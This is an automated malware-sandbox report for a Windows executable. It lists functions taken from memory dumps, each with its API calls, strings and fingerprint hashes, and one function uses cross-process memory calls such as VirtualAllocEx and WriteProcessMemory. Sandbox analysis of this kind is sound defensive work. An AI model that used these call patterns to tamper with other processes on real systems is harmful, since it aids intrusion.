Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7124f92e6787b4b58c8ce36dc1a19152d163df39fb50edfe38a98d6ca761ed3d
Instruction ID: eee1fcd9522f0050e021de86cfa610409153791c2a8454d244f8fd1344d18569
Opcode Fuzzy Hash: 7124f92e6787b4b58c8ce36dc1a19152d163df39fb50edfe38a98d6ca761ed3d
Instruction Fuzzy Hash: E1016D35C11529DBCF049FE4EC8D6DDBB78FF09312F110556E912B2140DB309668CB66

Function 002510F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00251114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 0025112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0025114D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 620bebc22ffe07845e0261e9ed315be363088f26c9aa21689cf54f079c1cb22f
Instruction ID: 3eea89ea48ea90004264672325a40430d37db576b745f3aa9c5b822b4d198861
Opcode Fuzzy Hash: 620bebc22ffe07845e0261e9ed315be363088f26c9aa21689cf54f079c1cb22f
Instruction Fuzzy Hash: A5016979201605BFDB114FA4EC8DA6A3B6EEF893A1B214468FA49C3360DB31DC108F70

Function 00250FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00250FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00250FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00250FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00250FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00251002

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b42129530e25f920fd8b40f1490ff964d8f995a7f2e7a8b956ded814db649021
Instruction ID: 5f461c01aa8582a65e4cbf425315a7cb2df469f83c4ac9d3170c31e9c4e0bb13
Opcode Fuzzy Hash: b42129530e25f920fd8b40f1490ff964d8f995a7f2e7a8b956ded814db649021
Instruction Fuzzy Hash: 79F04F39102311ABD7215FA4AC8DF563BADEF89762F604414FD49C6291CB70DC508B70

Function 00251014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0025102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00251036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00251045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0025104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00251062

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9ebf5a8dbd1a020a7b1bc502d6ae7516740ad9dcdfdbad0029fba45b611b5735
Instruction ID: afb6f30a9467d288e79bd06ae67fe7557fb84761622ef6200e7050671bad0fa4
Opcode Fuzzy Hash: 9ebf5a8dbd1a020a7b1bc502d6ae7516740ad9dcdfdbad0029fba45b611b5735
Instruction Fuzzy Hash: D7F04F39101321ABD7215FA4FC4DF563B6DEF89761F200414FD45C6291CB70D8508B70

Function 0026030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 00260324
CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 00260331
CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 0026033E
CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 0026034B
CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 00260358
CloseHandle.KERNEL32(?,?,?,?,0026017D,?,002632FC,?,00000001,00232592,?), ref: 00260365

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 270c25b402c0858ea989cb48971639289cb68736557619bfea4425ecc61e0fe4
Instruction ID: 3311b68c164a143ef2c7dcb64276ad6d2e8c266ab793973821070906d4d3cb60
Opcode Fuzzy Hash: 270c25b402c0858ea989cb48971639289cb68736557619bfea4425ecc61e0fe4
Instruction Fuzzy Hash: 9F01D072810B128FC730AF66D8C0807F7F5BE502063148A7ED19252A31C370A9A4EF80

Function 0022D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0022D752

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

_free.LIBCMT ref: 0022D764
_free.LIBCMT ref: 0022D776
_free.LIBCMT ref: 0022D788
_free.LIBCMT ref: 0022D79A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 49fe8d38ee1adc1bf3862e5626e1ee170bcbef68dc4cacd3ecfdfe8c7879dfd5
Instruction ID: da042949bb2d52b551d6640170dde2b1358df12d9c7a1bd7ec14ecc00fd80644
Opcode Fuzzy Hash: 49fe8d38ee1adc1bf3862e5626e1ee170bcbef68dc4cacd3ecfdfe8c7879dfd5
Instruction Fuzzy Hash: A4F0FF32564625FB9621EFA4F9C5C16B7DDBB487107F41D05F048D7501C729FC908A64

Function 00255C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00255C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00255C6F
MessageBeep.USER32(00000000), ref: 00255C87
KillTimer.USER32(?,0000040A), ref: 00255CA3
EndDialog.USER32(?,00000001), ref: 00255CBD

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8f502db2f159d890dbdf6ffd8d01d192114be1d860f7a64cf080f2facd8c13da
Instruction ID: f303bcb7f51743d0130c5a51ddb6dda78ff0fac61cd7d0c7c0c74ecbc4a4be8f
Opcode Fuzzy Hash: 8f502db2f159d890dbdf6ffd8d01d192114be1d860f7a64cf080f2facd8c13da
Instruction Fuzzy Hash: EA018B345117149BEB205F10ED5EFA577BCBF40707F00056AB553614E1D7F459588B54

Function 002222A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002222BE

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

_free.LIBCMT ref: 002222D0
_free.LIBCMT ref: 002222E3
_free.LIBCMT ref: 002222F4
_free.LIBCMT ref: 00222305

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d0a748a7e541453270be85e9f7fde855a3b1fc067b74c175206f136348855311
Instruction ID: 8908f4adfe7f4957efb9b623e56cf0b02cc3462d27b2aa2ce1430558533fe52b
Opcode Fuzzy Hash: d0a748a7e541453270be85e9f7fde855a3b1fc067b74c175206f136348855311
Instruction Fuzzy Hash: 09F05EB4820171FB8713AF94BC4AC483B64FB1D761761160AF824D22B2CB3708B5AFE5

Function 002095C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002095D4
StrokeAndFillPath.GDI32(?,?,002471F7,00000000,?,?,?), ref: 002095F0
SelectObject.GDI32(?,00000000), ref: 00209603
DeleteObject.GDI32 ref: 00209616
StrokePath.GDI32(?), ref: 00209631

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0b5125c67b300f3d78f4c57048726c6bcbc824c462fd86140f00a1142510812d
Instruction ID: 7d7a9098f654978d9d636c465e2ce5aaa49af00092b5630c4803eadc373794ff
Opcode Fuzzy Hash: 0b5125c67b300f3d78f4c57048726c6bcbc824c462fd86140f00a1142510812d
Instruction Fuzzy Hash: E7F01434016749EBDB629F69FD1DB643F65AB02362F148214F42A590F3C73289B5DF20

Function 00220F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002210F9
__freea.LIBCMT ref: 00221117

Part of subcall function 00221537: _free.LIBCMT ref: 0022154F

Strings

am/pm, xrefs: 0022117A
a/p, xrefs: 002211DE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: c1d80ccc40756a03edabb553bde22d9f11af9818e5c0c1b2562f6cd6c1fe538b
Instruction ID: e19ee2f23d7f466196944e9259c0eb12eb98a6bbdc73647e1531e81293182561
Opcode Fuzzy Hash: c1d80ccc40756a03edabb553bde22d9f11af9818e5c0c1b2562f6cd6c1fe538b
Instruction Fuzzy Hash: 3ED1E131930226EACB24DFE8E845FFAB7B2EF25300F240199E9059B650D7759DB1CB91

Function 002761D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00210242: EnterCriticalSection.KERNEL32(002C070C,002C1884,?,?,0020198B,002C2518,?,?,?,001F12F9,00000000), ref: 0021024D
Part of subcall function 00210242: LeaveCriticalSection.KERNEL32(002C070C,?,0020198B,002C2518,?,?,?,001F12F9,00000000), ref: 0021028A

Part of subcall function 002100A3: __onexit.LIBCMT ref: 002100A9

__Init_thread_footer.LIBCMT ref: 00276238

Part of subcall function 002101F8: EnterCriticalSection.KERNEL32(002C070C,?,?,00208747,002C2514), ref: 00210202
Part of subcall function 002101F8: LeaveCriticalSection.KERNEL32(002C070C,?,00208747,002C2514), ref: 00210235

Part of subcall function 0026359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002635E4
Part of subcall function 0026359C: LoadStringW.USER32(002C2390,?,00000FFF,?), ref: 0026360A

Strings

x#,, xrefs: 00276353
x#,, xrefs: 0027636F
x#,, xrefs: 0027633A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#,$x#,$x#,
API String ID: 1072379062-834180672
Opcode ID: 5ed828583661aabd12ff23d36453a9fe37fa3b8b34f8497471d2fe2fce16f95b
Instruction ID: 451923b9a2148241fee0cb55558cc36deeb913790da8627d17e37577284975aa
Opcode Fuzzy Hash: 5ed828583661aabd12ff23d36453a9fe37fa3b8b34f8497471d2fe2fce16f95b
Instruction Fuzzy Hash: 33C1B471A1050AAFCB14DF58C895EBEB7B9FF48300F548069FA099B291DB70ED64CB90

Function 00228A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00228B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00228B7A
__dosmaperr.LIBCMT ref: 00228B81

Strings

.!, xrefs: 00228A63

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .!
API String ID: 2434981716-3855568528
Opcode ID: 43bbcf1e3a2eeb51348e428520c19f4f78e6840b6cfbcb6808c5dbfea0f17031
Instruction ID: b33504a672f60fd73f076565d0289213ea652cdfe463a1d3c4257f1ed22d8aed
Opcode Fuzzy Hash: 43bbcf1e3a2eeb51348e428520c19f4f78e6840b6cfbcb6808c5dbfea0f17031
Instruction Fuzzy Hash: 0941AC70625065BFDB249FA4E884A797FE5EB85308F2841ADF899C7642DE31CC228790

Function 00252716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002521D0,?,?,00000034,00000800,?,00000034), ref: 0025B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00252760

Part of subcall function 0025B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0025B3F8

Part of subcall function 0025B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0025B355
Part of subcall function 0025B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00252194,00000034,?,?,00001004,00000000,00000000), ref: 0025B365
Part of subcall function 0025B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00252194,00000034,?,?,00001004,00000000,00000000), ref: 0025B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002527CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0025281A

Strings

@, xrefs: 00252832

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a7ea62d47a11a411955b15f7f0873d1f0eab26ccd490a5e2dbffc75a1eff69aa
Instruction ID: 6bc1138982416c36843920c476efb1addba3f13bbfe228e43e27fa6aa2798267
Opcode Fuzzy Hash: a7ea62d47a11a411955b15f7f0873d1f0eab26ccd490a5e2dbffc75a1eff69aa
Instruction Fuzzy Hash: 84413C76900218BFDB15DFA4CD85AEEBBB8AF09301F104095FA55B7181DB706E59CFA0

Function 0022172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\eLo1khn7DQ.exe,00000104), ref: 00221769
_free.LIBCMT ref: 00221834
_free.LIBCMT ref: 0022183E

Strings

C:\Users\user\Desktop\eLo1khn7DQ.exe, xrefs: 00221760, 00221767, 00221796, 002217CE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\eLo1khn7DQ.exe
API String ID: 2506810119-969204567
Opcode ID: fb6a83a38c969ecf2be5c0e3e4eca2163cb362d1b2f75052f94e8d23d4c30379
Instruction ID: 575bee73b4e6cf46936c6b726f7dd4cb340b6345d5fb4b70de8c9822e52fceec
Opcode Fuzzy Hash: fb6a83a38c969ecf2be5c0e3e4eca2163cb362d1b2f75052f94e8d23d4c30379
Instruction Fuzzy Hash: 3E318075A10229FBDB21DFD9A885D9EBBFCEBA5310B104166F80497211D7B18E70CBA1

Function 0025C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0025C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0025C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002C1990,00CD5620), ref: 0025C395

Strings

0, xrefs: 0025C2DF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 253041c394ca3303351485b83270bd01e7ec6a3c20ce66b1beeccdee82c541da
Instruction ID: a7106bb290ed7b4437434412314f5d787d64ceb87671f1cefee1c859e3c00613
Opcode Fuzzy Hash: 253041c394ca3303351485b83270bd01e7ec6a3c20ce66b1beeccdee82c541da
Instruction Fuzzy Hash: 2C41E331214306AFD720DF24D884B1ABBE4AF85321F24866DFDA5972D1E730E918CB66

Function 00284416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0028CC08,00000000,?,?,?,?), ref: 002844AA
GetWindowLongW.USER32 ref: 002844C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002844D7

Strings

SysTreeView32, xrefs: 0028447C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e40fe2a3d918a4038d1ea6e93a25c45ceb6c83c775a48b860dccd08556a23734
Instruction ID: 458754c320826dc787fd29061eb5531d3b47eab2740a4ba887bc36899dd47686
Opcode Fuzzy Hash: e40fe2a3d918a4038d1ea6e93a25c45ceb6c83c775a48b860dccd08556a23734
Instruction Fuzzy Hash: 5031B035221206AFDF20AE78DC45BEA77A9EB09334F204725F979921D1D774EC609B60

Function 00256E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00256EED
VariantCopyInd.OLEAUT32(?,?), ref: 00256F08
VariantClear.OLEAUT32(?), ref: 00256F12

Strings

*j%, xrefs: 00256E8B, 00256E90, 00256EF8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
